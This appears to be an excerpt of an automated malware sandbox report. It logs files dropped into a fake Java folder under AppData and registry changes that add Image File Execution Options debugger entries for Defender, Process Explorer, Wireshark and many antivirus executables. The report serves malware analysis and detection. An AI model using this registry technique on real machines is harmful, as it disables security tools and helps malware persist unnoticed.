Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\management.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_2.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\vcruntime140.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\net.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2gss.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\vcruntime140.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\sspi_bridge.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\ucrtbase.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe File created: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcp140.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\README.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt

Boot Survival
barindex
Creates a Image File Execution Options (IFEO) Debugger entry
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mergecap.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mergecap.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Up.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Up.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Medic.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Medic.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuarScanner.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuarScanner.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardUpdate.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardUpdate.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\clamscan.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\clamscan.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cis.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cis.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FPAVServer.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FPAVServer.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVK.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVK.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GdBgInx64.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GdBgInx64.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDScan.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDScan.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKWCtlx64.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKWCtlx64.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKTray.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKTray.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\guardxkickoff_x64.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\guardxkickoff_x64.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7CrvSvc.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7CrvSvc.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7TSMain.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7TSMain.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7TSMngr.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7TSMngr.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nnf.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nnf.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nbrowser.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nbrowser.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nfservice.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nfservice.exe debugger
